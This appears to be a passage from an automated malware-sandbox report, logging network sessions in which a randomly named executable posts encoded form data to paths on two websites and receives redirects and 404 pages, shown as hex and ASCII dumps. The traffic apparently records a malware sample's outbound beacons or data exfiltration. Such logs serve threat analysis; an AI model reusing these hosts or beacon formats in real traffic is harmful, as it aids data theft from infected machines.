                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.4497543.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:56.042025089 CEST794OUTPOST /4d31/ HTTP/1.1
                                                            Host: www.gtprivatewealth.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.gtprivatewealth.com
                                                            Referer: http://www.gtprivatewealth.com/4d31/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 31 36 78 70 53 34 4b 51 79 53 52 39 69 6f 53 62 70 69 30 35 4b 77 66 72 36 42 63 6a 67 49 50 34 2b 63 4b 69 33 78 50 43 62 4f 75 4d 6a 48 66 44 6e 49 50 42 6f 54 62 78 69 65 79 4a 44 30 50 47 59 52 6c 2b 5a 41 4b 77 32 6a 68 47 56 64 5a 52 46 51 2b 7a 58 6f 57 6e 39 56 68 2f 31 6e 65 4d 68 4c 46 42 6d 2b 67 57 35 59 68 64 78 30 71 76 2b 2b 6a 7a 34 36 75 36 2f 56 4b 79 4a 4d 2b 44 61 58 32 71 4c 4c 62 2f 4d 72 39 78 6d 31 70 42 4c 39 63 49 38 62 66 4e 6b 57 59 63 55 79 76 6a 6d 39 4a 49 45 73 64 74 4a 35 6c 7a 59 31 50 45 2b 63 75 58 6d 51 45 32 52 32 43 72 64 6a 51 37 62 41 3d 3d
                                                            Data Ascii: 4NZpb=16xpS4KQySR9ioSbpi05Kwfr6BcjgIP4+cKi3xPCbOuMjHfDnIPBoTbxieyJD0PGYRl+ZAKw2jhGVdZRFQ+zXoWn9Vh/1neMhLFBm+gW5Yhdx0qv++jz46u6/VKyJM+DaX2qLLb/Mr9xm1pBL9cI8bfNkWYcUyvjm9JIEsdtJ5lzY1PE+cuXmQE2R2CrdjQ7bA==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.4497553.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:58.581315041 CEST814OUTPOST /4d31/ HTTP/1.1
                                                            Host: www.gtprivatewealth.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.gtprivatewealth.com
                                                            Referer: http://www.gtprivatewealth.com/4d31/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 31 36 78 70 53 34 4b 51 79 53 52 39 6a 4c 61 62 75 42 73 35 49 51 66 6f 6e 78 63 6a 70 6f 50 6b 2b 63 47 69 33 78 6d 64 62 64 61 4d 6a 6d 76 44 31 38 62 42 70 54 62 78 70 2b 79 51 63 45 50 4e 59 52 70 32 5a 46 71 77 32 6a 6c 47 56 63 46 52 46 43 57 77 57 34 57 68 31 31 68 35 36 48 65 4d 68 4c 46 42 6d 36 41 77 35 59 70 64 78 45 36 76 2b 62 58 38 37 36 75 35 76 31 4b 79 4e 4d 2f 72 61 58 32 55 4c 50 44 46 4d 74 35 78 6d 31 5a 42 4c 50 6b 48 32 62 66 50 36 57 5a 43 55 69 75 57 6f 59 30 35 4f 76 68 54 42 37 78 43 64 7a 65 65 76 74 50 41 30 51 67 46 4d 78 4c 66 51 67 74 79 41 42 57 79 53 64 69 7a 53 5a 4a 61 33 6b 49 51 65 33 6c 4a 34 69 67 3d
                                                            Data Ascii: 4NZpb=16xpS4KQySR9jLabuBs5IQfonxcjpoPk+cGi3xmdbdaMjmvD18bBpTbxp+yQcEPNYRp2ZFqw2jlGVcFRFCWwW4Wh11h56HeMhLFBm6Aw5YpdxE6v+bX876u5v1KyNM/raX2ULPDFMt5xm1ZBLPkH2bfP6WZCUiuWoY05OvhTB7xCdzeevtPA0QgFMxLfQgtyABWySdizSZJa3kIQe3lJ4ig=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.4497563.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:01.131511927 CEST10896OUTPOST /4d31/ HTTP/1.1
                                                            Host: www.gtprivatewealth.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.gtprivatewealth.com
                                                            Referer: http://www.gtprivatewealth.com/4d31/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 31 36 78 70 53 34 4b 51 79 53 52 39 6a 4c 61 62 75 42 73 35 49 51 66 6f 6e 78 63 6a 70 6f 50 6b 2b 63 47 69 33 78 6d 64 62 63 69 4d 69 55 6e 44 6b 75 7a 42 34 6a 62 78 31 75 79 4e 63 45 50 51 59 52 78 79 5a 46 76 4c 32 68 74 47 55 2b 68 52 53 47 43 77 59 34 57 68 71 6c 68 34 31 6e 66 4f 68 4c 31 64 6d 2b 73 77 35 59 70 64 78 47 79 76 35 4f 6a 38 33 61 75 36 2f 56 4c 67 4a 4d 2b 47 61 54 53 45 4c 50 50 56 4d 64 5a 78 6d 52 39 42 59 4b 49 48 36 62 66 4a 2f 57 5a 4b 55 69 69 2f 6f 59 42 47 4f 75 56 35 42 35 74 43 52 47 6a 54 31 2b 66 36 75 42 77 2b 4f 43 58 56 65 33 35 7a 4a 77 4c 4f 44 50 57 55 41 4b 39 76 71 32 5a 47 4e 46 70 51 6d 31 75 2b 47 35 64 30 6a 4d 54 41 70 61 51 44 41 52 78 31 72 33 59 41 6d 43 2b 6f 31 74 53 58 6a 68 34 74 71 4f 6b 78 79 33 69 59 59 52 76 46 63 36 6f 62 34 73 7a 41 59 79 37 44 49 45 6c 65 46 56 37 43 4e 4e 39 5a 62 72 37 51 64 6b 73 4b 45 2b 75 6f 70 78 65 43 66 4b 4e 70 51 4c 79 53 43 39 78 52 7a 4c 52 4c 50 48 71 52 46 6d 5a 4f 71 6b 7a 43 32 71 58 6b [TRUNCATED]
                                                            Data Ascii: 4NZpb=16xpS4KQySR9jLabuBs5IQfonxcjpoPk+cGi3xmdbciMiUnDkuzB4jbx1uyNcEPQYRxyZFvL2htGU+hRSGCwY4Whqlh41nfOhL1dm+sw5YpdxGyv5Oj83au6/VLgJM+GaTSELPPVMdZxmR9BYKIH6bfJ/WZKUii/oYBGOuV5B5tCRGjT1+f6uBw+OCXVe35zJwLODPWUAK9vq2ZGNFpQm1u+G5d0jMTApaQDARx1r3YAmC+o1tSXjh4tqOkxy3iYYRvFc6ob4szAYy7DIEleFV7CNN9Zbr7QdksKE+uopxeCfKNpQLySC9xRzLRLPHqRFmZOqkzC2qXkvJx/qQsFVIMp0WDEVOCRtykN/O/iBlwlxhWCdBM14lT00k86xTiUxI9xp0evLT1Q0QhH7IYaDMcjo+/fiocG84JxjyJ4ckN8/Ee1HH8qMvv+gi20qpkP7sNh7TApdAIM7raPKe6Rf+mM9f+U54Sl3vi9wTm02Ncb3P59f15nj16SeyS6icYrU3I19k3LwdmIZO5GTaRP3DCJn5ljKN4G94uJQGyuXrEfWZX7PYaVes+WClUyzc3Nc1sAc7UhguvCQ1VC/AO8EEwkYILitF2+fYjv3Bm2JqMGvKZehnPBZtkVAX67oLJgMzAobYffRlxHIFNdoOesRukwv7fz4iGfCGIWRY3HF7aMVb9+oBsk5QJ7PUgtHAepJvMuGTp7imTjHBJ5Vtmuh6MHSDR1R5P8O0tjgCxyf+GBs/C/ctrmCxhmVx37xqDBiHR/AX7+CJC5lmj3TSdBcWRk7oP5PnvoSKNLTWKMZ/EMvqIW4hMpEILkCzHLj1pnx3NBia+ocMOTmtgbc9MabSKLYXIWa4vAGzKcqOHP9CvuxJJosqV1b+SmoAd9sshVfsxF4gnNlLeUogklF00eXUEAE4CsTLp+7p27soNKRhrHIGZSXuFc8a0PIYhxCGQDyOOh4gAf/uaGyT1TdF85VA5WgnPWLJV9JulBVauo18Vytw [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.4497573.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:03.721163034 CEST519OUTGET /4d31/?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X HTTP/1.1
                                                            Host: www.gtprivatewealth.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:05.108885050 CEST400INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 28 Aug 2024 12:04:05 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 260
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 4e 5a 70 62 3d 34 34 5a 4a 52 4d 36 41 67 54 56 50 6b 4b 69 6c 2b 6b 64 32 45 43 44 6c 6a 69 41 69 6e 5a 7a 74 68 61 47 39 6e 53 54 48 4c 65 69 2b 6c 30 61 77 31 4f 54 71 30 68 48 48 30 73 4f 5a 43 47 69 69 56 43 4a 5a 66 44 32 5a 2b 68 42 37 64 76 5a 45 57 77 57 4b 49 2f 71 4a 73 7a 52 31 32 69 57 53 73 61 78 64 39 5a 4e 50 38 4a 73 72 36 55 50 66 6d 36 43 61 35 71 49 3d 26 38 6c 65 3d 39 58 50 70 5f 30 5f 68 55 72 46 34 35 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.449758188.114.96.380792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:10.191402912 CEST770OUTPOST /7qad/ HTTP/1.1
                                                            Host: www.katasoo.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.katasoo.com
                                                            Referer: http://www.katasoo.com/7qad/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 51 61 6d 78 70 63 43 68 68 62 6b 6e 62 46 67 6a 6e 52 56 41 47 31 6e 7a 38 64 31 58 4e 41 58 31 6d 4f 53 49 6c 5a 53 4c 35 33 68 4f 51 42 39 41 64 4e 58 30 4c 6a 33 54 56 45 5a 38 68 47 6a 67 42 67 2b 6f 45 38 46 54 32 78 69 53 75 58 75 32 45 78 38 2b 75 69 36 4d 4d 55 75 76 61 4d 49 39 56 71 6a 30 35 74 70 36 4c 4d 61 73 62 43 50 69 44 45 78 4e 68 57 61 4e 72 2b 77 62 48 4b 4e 53 59 6b 33 79 50 48 45 52 43 53 68 47 36 75 7a 4d 57 6a 72 6a 77 55 54 48 62 69 33 35 43 6d 4a 4f 54 72 2f 52 36 48 71 76 42 6e 36 46 75 66 6b 57 6b 6e 58 39 67 69 57 5a 59 69 6c 4d 75 42 5a 4e 38 77 3d 3d
                                                            Data Ascii: 4NZpb=QamxpcChhbknbFgjnRVAG1nz8d1XNAX1mOSIlZSL53hOQB9AdNX0Lj3TVEZ8hGjgBg+oE8FT2xiSuXu2Ex8+ui6MMUuvaMI9Vqj05tp6LMasbCPiDExNhWaNr+wbHKNSYk3yPHERCShG6uzMWjrjwUTHbi35CmJOTr/R6HqvBn6FufkWknX9giWZYilMuBZN8w==
                                                            Aug 28, 2024 14:04:10.871634007 CEST1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:04:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_5063416e1289b199f2413e8737e4ca%7C%7C1725019450%7C%7C1725015850%7C%7Cceb62e721885b64e1797ee288a644a39; expires=Fri, 30-Aug-2024 12:04:10 GMT; Max-Age=172800; path=/; HttpOnly
                                                            link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"
                                                            vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7Jb45O%2F58zDZA7wBpQvRHF%2FnNwZ%2BtBualZ1TqGrDukHaoO%2FFAOZU5vBUn%2FNvODMGvQRKOP7N10CqreOWygb2jVDdpqVneUfd2J3z3LR%2B5T78GrEGva1tFzZq9wOBaJbhzY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba4298e590842f1-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 33 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 6e b6 64 39 9b 49 a7 a7 7b 27 99 f4 b4 d3 5f 7f bd 89 57 07 22 21 89 36 45 32 04 69 d9 ed d6 03 ed 6b ec 93 ed 29 00 24 41 8a ba f8 92 99 d9 b3 5f cf c4 92 80 42 a1 50 00 0a 85 42 a1 70 fa ec fb 8f 6f 3f fd fe f3 3b 34 4f 16 fe d9 e1 e9 33 4d fb ec 4d d1 4f ef d0 09 ba 38 43 a7 90 8c 7c 1c cc 46 0a 09 b4 5f cf 15 e4 f8 98 d2 91 e2 91 13 e4 87 d8 f5 82 99 46 bd 84 a0 20 d4 2e a9 72 86 4e 9f 7d 26 81 eb 4d 2f 34 ad 84 ef 78 17 be e3 7b e0 6b ce 12 c2 88 6c fd f9 ac f9 d3 bb d6 c5 19 e4 9c 6d
                                                            Data Ascii: 36c9}v8o}XRnd9I{'_W"!6E2ik)$A_BPBpo?;4O3MMO8C|F_F .rN}&M/4x{klm
                                                            Aug 28, 2024 14:04:10.871649981 CEST1236INData Raw: 46 bf 01 b5 a6 95 d1 cf 09 76 cf 0e 0f 4e 17 24 c1 c8 99 e3 98 92 64 a4 fc fa e9 07 ed 58 41 06 e4 f8 5e 70 85 62 e2 8f 94 28 0e a7 9e 4f 14 34 8f c9 74 a4 cc 93 24 1a 18 c6 6c 11 cd f4 30 9e 19 37 d3 c0 b0 ac f5 52 5e 30 9b 60 e7 aa 52 ec 0a 27
                                                            Data Ascii: FvN$dXA^pb(O4t$l07R^0`R'fG><8NEYsNA:k*'1|eebKhZM7t='K|r34EGmqyu^Q#'aB73E1rxF
                                                            Aug 28, 2024 14:04:10.871654987 CEST1236INData Raw: 3a fa cc 67 a4 2a 46 c5 85 1a e8 42 14 d3 d1 1d 9b f3 c9 dc 0b 66 83 67 a6 5a fc 7a 77 e3 90 28 f9 c1 c7 90 be 52 09 93 7e a2 c6 12 0b 3c 1d bb ee bb 6b 12 24 ef 3d 9a c0 0a d1 54 be ff f8 e1 2d 57 a1 de 87 d8 25 ae a2 12 f5 2e 0c 1c c2 ba 61 c5
                                                            Data Ascii: :g*FBfgZzw(R~<k$=T-W%.a+)AFLG7++,[Z7m*82D ]LH,stTJzf4Q*-NLL}d>Zw@YttTW(@_Vn%iPgIxfT^}
                                                            Aug 28, 2024 14:04:10.871737003 CEST1236INData Raw: ad 5a c7 5d d5 2c d8 00 89 5d d5 32 45 e2 bd 48 e1 55 16 dc 60 53 62 7b fd 52 55 82 0f b6 d9 57 3b 3d b5 d3 db 55 39 28 6a 79 57 e0 5b a8 76 5d 08 6c e9 04 bb 7d ac 8a 7f c5 18 e8 9d a8 d6 71 47 b5 4e ba bb aa 77 c2 d0 87 3a 97 38 5e 68 4c 9c c5
                                                            Data Ascii: Z],]2EHU`Sb{RUW;=U9(jyW[v]l}qGNw:8^hLbkj;T?i![tL:YZXteiP'-tuTswot.{j{6YTcW[qzj]uAP7nJhb[,h.jucf2ti
                                                            Aug 28, 2024 14:04:10.871751070 CEST1236INData Raw: 34 66 14 ba df a8 29 30 c6 b2 2a 1e 42 bd e4 8a 1a 86 ec 12 5e ec 90 cc 23 6e ab 63 9c 2e 15 40 30 f4 91 ce 26 40 1c 2e 91 0e 17 34 bc 98 b8 e8 0e 5d 7b d4 9b 78 be 97 dc 0e f8 77 9f 0c d1 9e 5e 9a 61 a8 5d e3 d8 63 ee 7c 1a 5d 82 b7 36 a1 0f e3
                                                            Data Ascii: 4f)0*B^#nc.@0&@.4]{xw^a]c|]6:,VYfO>jj\o*>` X}~Kgxp0GMSsi.2~j5hr/m&@%5`x~6Gpl 5^m%iVGpk
                                                            Aug 28, 2024 14:04:10.871773005 CEST1236INData Raw: b8 b8 3b dc c8 43 48 ff 43 f3 02 97 dc 00 35 9d 2e 34 2f df 55 67 52 e1 ec f2 1f a0 3d e6 d1 d8 5a fc 7a 7c 7e 9f 1e 35 bf 6b 09 0e 18 06 f2 f1 1f b7 2c 48 1e 4b 80 30 78 8d 46 96 0d ff 71 64 3a b9 01 79 d0 14 bf a0 10 c4 fe f8 cf 4f aa 04 0a ff
                                                            Data Ascii: ;CHC5.4/UgR=Zz|~5k,HK0xFqd:yOy$5PK1,,50pf3]0+ $L"R4IZs0Fa\$%VNF,DSSjUY&@`?\/4$n` noAb
                                                            Aug 28, 2024 14:04:10.871784925 CEST776INData Raw: 4a 9b 1b 37 2d 87 b5 1b 75 a6 e9 1a 06 62 ce 3a 93 62 4f 7d b8 bf 19 25 e7 4f ee f0 43 85 04 6f 6c 1f 0c 4f b1 ed 9e 7b ae 4b 02 79 36 ed b5 23 ab b7 03 7c 23 5b 80 d8 dd 75 8b dd 5d b6 bd 60 da b9 25 a9 e7 99 fa be 07 63 99 2d 68 43 13 61 20 79
                                                            Data Ascii: J7-ub:bO}%OColO{Ky6#|#[u]`%c-hCa y4!UaeX`*h>.0b>^5qIVdkjnKFmqS->MkM^UtYA2R+TrUybZiwW/XtU#1c`&(Q~Rc[_C tHIbp
                                                            Aug 28, 2024 14:04:10.872050047 CEST1236INData Raw: d5 6e f2 72 a4 6c 31 63 29 17 82 ba b5 7d fd 2e 0d 27 ab 62 56 51 ca 8a 01 9c 32 61 99 c3 6d b0 eb 34 2a 4b cb b3 34 f6 b7 db 8b b3 3d 78 ed 4c 66 02 9f d9 1e 7e e3 b3 5a 4e fa 31 9b e1 20 3c d7 28 4d 63 bf 78 3c 0b 08 7e 69 a8 8c a7 1a 6c b2 79
                                                            Data Ascii: nrl1c)}.'bVQ2am4*K4=xLf~ZN1 <(Mcx<~ilyPC_IcHo4&>aOg0;9[/?Pfj#r8|8\e~SDvRBH-D1#_a7qm3'U&#%f+gdv'V@:@"Yt
                                                            Aug 28, 2024 14:04:10.872061014 CEST1236INData Raw: c9 7e b8 80 0c 3c e3 5a a6 60 79 84 c1 d1 88 ed 47 c5 88 d5 9d 34 06 99 a1 6e c8 a7 11 0e 06 cc 15 6c 13 04 ce b2 61 04 b1 af 3c 61 eb 08 e0 ef 18 7d e6 eb 1c 4d 27 0b 2f 51 a0 d3 78 ba be 74 40 06 2c 71 ec 0e 82 30 69 ea d9 5e a9 55 fe 29 9e 72
                                                            Data Ascii: ~<Z`yG4nla<a}M'/Qxt@,q0i^U)rj9*^$hldGh]1A9Wp|Gw)kJmg US&cN%aD^|"1q3>|GVT.>&=,fC;o}yy`w
                                                            Aug 28, 2024 14:04:10.872071981 CEST1236INData Raw: 52 6c f0 18 0e 6c 2c 35 2e d0 5d 11 16 83 2d 84 68 b5 dd 58 9b bb 04 28 7f 27 4b 65 98 41 cf c3 64 3b f4 8f 61 52 40 c3 48 da 0e 7e 8e 7d 52 c0 47 61 04 81 f6 b6 17 f9 99 03 29 92 f3 88 01 a2 0c ce ca d9 9b 8b e2 b6 30 f3 24 ed 98 1d 7e b1 4d cb
                                                            Data Ascii: Rll,5.]-hX('KeAd;aR@H~}RGa)0$~M\ZjGEQsBco-wkC?"HKSmBy,t.S5^y!Gn)gW^0;K>50*c-)_k5~-r2]DY"0/0M
                                                            Aug 28, 2024 14:04:10.876611948 CEST1236INData Raw: 06 42 76 f3 34 90 7b bf 40 90 c5 d8 81 bf 9a b0 d3 d4 ce 1a a9 08 37 57 f2 83 43 be 73 2d 8d b2 79 27 5f 3c 0b 99 0c 8d 3a 35 e6 9d 4d e3 d1 a3 9a 0b af 30 f2 30 bf f9 0c 29 4d 97 07 4d e3 7f ca 44 ae 6d 12 e3 58 76 3c 97 b9 34 14 fa 1f 2f 2e a1
                                                            Data Ascii: Bv4{@7WCs-y'_<:5M00)MMDmXv<4/.f}eLG)$Yvum46w-kUH~]t`R7MY4MWd(^RE-pf"S~foszMI0v)[n?x'


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.449759188.114.96.380792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:04:12.721880913 CEST790OUTPOST /7qad/ HTTP/1.1
                                                            Host: www.katasoo.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.katasoo.com
                                                            Referer: http://www.katasoo.com/7qad/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 51 61 6d 78 70 63 43 68 68 62 6b 6e 61 6b 51 6a 68 33 64 41 52 6c 6e 77 67 74 31 58 47 67 58 78 6d 4f 57 49 6c 64 4b 62 36 43 35 4f 52 67 68 41 61 50 2f 30 59 54 33 54 66 6b 59 33 76 6d 6a 72 42 67 7a 58 45 2b 52 54 32 79 65 53 75 53 43 32 45 43 55 39 75 79 36 4f 5a 6b 75 70 48 63 49 39 56 71 6a 30 35 74 55 66 4c 4d 69 73 62 7a 66 69 43 6c 78 4b 2f 47 61 4b 6f 2b 77 62 44 4b 4e 57 59 6b 32 64 50 47 5a 4d 43 55 6c 47 36 73 37 4d 56 78 4f 31 36 55 54 4e 57 43 32 55 50 6e 67 31 5a 35 65 6b 79 68 6d 79 45 57 6d 44 76 5a 31 4d 31 57 32 71 79 69 79 71 46 6c 73 34 6a 43 6b 45 6e 7a 50 37 4f 4c 46 6d 2f 74 33 42 4f 36 50 4e 48 6f 4a 55 66 6f 67 3d
                                                            Data Ascii: 4NZpb=QamxpcChhbknakQjh3dARlnwgt1XGgXxmOWIldKb6C5ORghAaP/0YT3TfkY3vmjrBgzXE+RT2yeSuSC2ECU9uy6OZkupHcI9Vqj05tUfLMisbzfiClxK/GaKo+wbDKNWYk2dPGZMCUlG6s7MVxO16UTNWC2UPng1Z5ekyhmyEWmDvZ1M1W2qyiyqFls4jCkEnzP7OLFm/t3BO6PNHoJUfog=
                                                            Aug 28, 2024 14:04:13.389419079 CEST1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:04:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_ffb160b8a35cf1a8ebfd13dcf4b1ef%7C%7C1725019453%7C%7C1725015853%7C%7C1698686f1ff4342c0ee039076d21f46f; expires=Fri, 30-Aug-2024 12:04:13 GMT; Max-Age=172800; path=/; HttpOnly
                                                            link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"
                                                            vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAHIDblWZMBoVnCky%2BdXB78e9qmR%2FCMHlo5MNucYLNiG1BtPr%2Fkl0ckJc0UWdKoshdPzns%2B8HqBwAL4wwTGhJXM05S%2BmopFWTc%2B3qlvShCLzvK8O0KBauO%2BVlb73sWPliT0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba4299e0a1f429d-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
